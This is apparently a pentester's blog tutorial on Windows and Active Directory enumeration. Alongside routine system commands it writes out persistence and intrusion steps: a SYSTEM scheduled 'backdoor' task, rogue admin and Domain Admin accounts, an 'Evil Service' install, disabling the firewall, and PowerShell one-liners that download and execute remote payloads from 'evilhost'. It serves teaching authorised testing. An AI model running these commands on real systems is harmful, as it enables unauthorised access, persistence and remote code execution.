During pentest processes gathering information about systems are very essential. Here is the few commands that i personally use frequently due to gathering information about Microsoft Architectures;
Notice That: You can get more information about commands that we will use in this article by typing help commandname or commandname \?
Information Gathering About Local System
For detecting Network adapters, IP adresses, DNS server:
C:\Users\Hyaloid>ipconfig /all
--code snippet--
IPv4 Address. . . . . . . . . . . : 10.0.0.43
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 10.0.10.100
DNS Servers . . . . . . . . . . . : 10.0.0.1
--code snippet--
Gathering information about open ports(detecting services which only runs in local):
C:\Users\Hyaloid>netstat -anot
Proto Local Address Foreign Address State PID Offload State
TCP 0.0.0.0:135 0.0.0.0:0 LISTENING 536 InHost
TCP 0.0.0.0:445 0.0.0.0:0 LISTENING 4 InHost
TCP 0.0.0.0:902 0.0.0.0:0 LISTENING 3800 InHost
TCP 0.0.0.0:912 0.0.0.0:0 LISTENING 3800 InHost
TCP 0.0.0.0:1536 0.0.0.0:0 LISTENING 680 InHost
TCP 0.0.0.0:1537 0.0.0.0:0 LISTENING 1272 InHost
TCP 0.0.0.0:1538 0.0.0.0:0 LISTENING 1784 InHost
TCP 0.0.0.0:1539 0.0.0.0:0 LISTENING 760 InHost
TCP 0.0.0.0:1540 0.0.0.0:0 LISTENING 3216 InHost
--code snippet--
Gathering information about tasks & killing tasks(if you have enough privilege to do);
C:\Users\Hyaloid>tasklist
--Shows All Tasks running--
--Code Snippet--
C:\Users\Hyaloid>tasklist /FI "PID eq 4372" --Finding procces which PID is equal to 4372--
Image Name PID Session Name Session# Mem Usage
========================= ======== ================ =========== ============
TeamViewer_Service.exe 4372 Services 0 17.568 K
C:\WINDOWS\system32>tasklist /FI "USERNAME eq NT AUTHORITY\SYSTEM" /FI "STATUS eq running" --Finding procces which runs as NT Authority--
Image Name PID Session Name Session# Mem Usage
========================= ======== ================ =========== ============
csrss.exe 688 Console 1 13.456 K
NVDisplay.Container.exe 1876 Console 1 23.504 K
C:\WINDOWS\system32>taskkill /F /FI "PID eq 4372" --Killing procces which PID is equal to 4372--
SUCCESS: The process with PID 4372 has been terminated.
Gathering information about system (OS Name, Version, Type, Installed Hotfixes etc.):
C:\Users\Hyaloid>systeminfo
--code snippet--
OS Name: Microsoft Windows 10 Education
OS Version: 10.0.15063 N/A Build 15063
--code snippet--
System Type: x64-based PC
--code snippet--
Hotfix(s): 4 Hotfix(s) Installed.
[01]: KB4022405
[02]: KB4025376
[03]: KB4038806
[04]: KB4040724
--code snippet--
Gathering scheduled tasks & creating scheduled tasks (you must be administrator):
C:\WINDOWS\system32>schtasks
--code snippet--
Folder: \
TaskName Next Run Time Status
======================================== ====================== ===============
Adobe Acrobat Update Task 10.07.2018 01:00:00 Ready
Adobe Flash Player NPAPI Notifier 14.07.2018 03:01:00 Ready
--code snippet--
Folder: \Microsoft\Windows\ApplicationData
TaskName Next Run Time Status
======================================== ====================== ===============
appuriverifierdaily 10.07.2018 03:00:00 Ready
appuriverifierinstall 14.07.2018 03:00:00 Ready
CleanupTemporaryState N/A Ready
DsSvcCleanup N/A Ready
--code snippet--
C:\WINDOWS\system32>schtasks /create /ru SYSTEM /sc MINUTE /MO 5 /tn backdoor /tr "\"C:\\Users\\Hyaloid\\backdoor.exe\""
Finding, adding, deleting users and groups & gathering information about spesific user and group:
C:\WINDOWS\system32>net users
--code snippet--
-------------------------------------------------------------------------------
Administrator Guest Hyaloid
DefaultUser
C:\WINDOWS\system32>net localgroup
--code snippet--
*__vmware__
*Administrators
*Backup Operators
*Cryptographic Operators
*Distributed COM Users
--code snippet--
C:\WINDOWS\system32>net users pentest Password1 /add
Command completed successfully.
C:\WINDOWS\system32>net localgroup "Administrators" pentest /add
Command completed successfully.
C:\WINDOWS\system32>net users pentest /del
Command completed successfully.
C:\WINDOWS\system32>net users pentest Password1 /add /DOMAIN (for adding user to domain)
Command completed sucessfully.
C:\WINDOWS\system32>net group "Domain Admins" pentest /DOMAIN /add (Only could be used by Domain Admin)
Command completed succesfully
C:\WINDOWS\system32>net users hyaloid
--code snippet--
Local Group Memberships *Administrators
*Performance Log Users
Global Group memberships *None
--code snippet--
Information gathering about services:
C:\>sc query
--code snippet--
SERVICE_NAME: SQLWriter
DISPLAY_NAME: SQL Server VSS Writer
TYPE : 10 WIN32_OWN_PROCESS
STATE : 4 RUNNING
(STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x0
SERVICE_NAME: SSDPSRV
DISPLAY_NAME: SSDP Bulma
TYPE : 30 WIN32
STATE : 4 RUNNING
(STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x0
--code snippet--
C:\>sc query state= inactive //stopped services
--code snippet--
Starting, stopping, deleting and editing services:
C:\>sc create "Evil Service" binPath= "C:\Hyaloid\evil.exe" start= auto
C:\>sc start "Evil Service" //start
C:\>sc stop "Evil Service" //stop
C:\>sc config "Evil Service" binPath= "C:\Users\Hacker\Desktop\evil.exe" start= manuel //edit
C:\>sc delete "Evil Service" //delete
Checking file permissions:
C:\>icacls "C:\Users\Hyaloid\AppData\Local\Temp"
C:\Users\Hyaloid\AppData\Local\Temp Everyone:(OI)(CI)(F)
NT AUTHORITY\SYSTEM:(OI)(CI)(F)
Playing with firewall configutions:
PS C:\WINDOWS\system32> netsh advfirewall show currentprofile
Private Profile Settings:
----------------------------------------------------------------------
State ON
Firewall Policy BlockInbound,AllowOutbound
LocalFirewallRules N/A (GPO-store only)
LocalConSecRules N/A (GPO-store only)
InboundUserNotification Enable
--code snippet--
PS C:\WINDOWS\system32> netsh advfirewall set currentprofile state off //You can change profile to domainprofile.
Ok.
Downloading files to target system via powershell:
C:\>powershell.exe (New-Object System.Net.WebClient).DownloadFile('http://192.168.1.103/evil.exe','C:\Users\Hyaloid\Downloads\evil.exe')
Downloading and executing .ps1 files via powershell (you can use this to execute malicious powershell files on target):
powershell.exe “IEX (New-Object Net.WebClient).DownloadString(‘http://evilhost/Malicious.ps1’)"
Microsoft Domain Structer Enumeration
In order to gather information about Domain structers, i personally use an excellent and simple tool called windapsearch. Its uses LDAP queries to extract information about users, groups and computers.
Here is an example taken from its README file;
root@kali:~/windapsearch# ./windapsearch.py -d lab.ropnop.com -u ropnop\\ldapbind -p GoCubs16 --da
[+] No DC IP provided. Will try to discover via DNS lookup.
[+] Using Domain Controller at: 172.16.13.10
[+] Getting defaultNamingContext from Root DSE
[+] Found: DC=lab,DC=ropnop,DC=com
[+] Attempting bind
[+] ...success! Binded as:
[+] u:ROPNOP\ldapbind
[+] Attempting to enumerate all Domain Admins
[+] Using DN: CN=Domain Admins,CN=Users.CN=Domain Admins,CN=Users,DC=lab,DC=ropnop,DC=com
[+] Found 12 Domain Admins:
cn: Administrator
cn: Andy Green
userPrincipalName: agreen@lab.ropnop.com
cn: Natasha Strong
userPrincipalName: nstrong@lab.ropnop.com
cn: Linda Alton
userPrincipalName: lalton@lab.ropnop.com
And also a few metasploit modules that you can use to gather information about domain;
post/windows/gather/enum_domain
post/windows/gather/enum_domain_group_users
post/windows/gather/enum_domain_users
post/windows/gather/enum_domains
post/windows/gather/enum_ad_computers
Of course this techniques are not all of techniques that pentesters may use in order to gather information but at least i can say that im using these techniques for sure.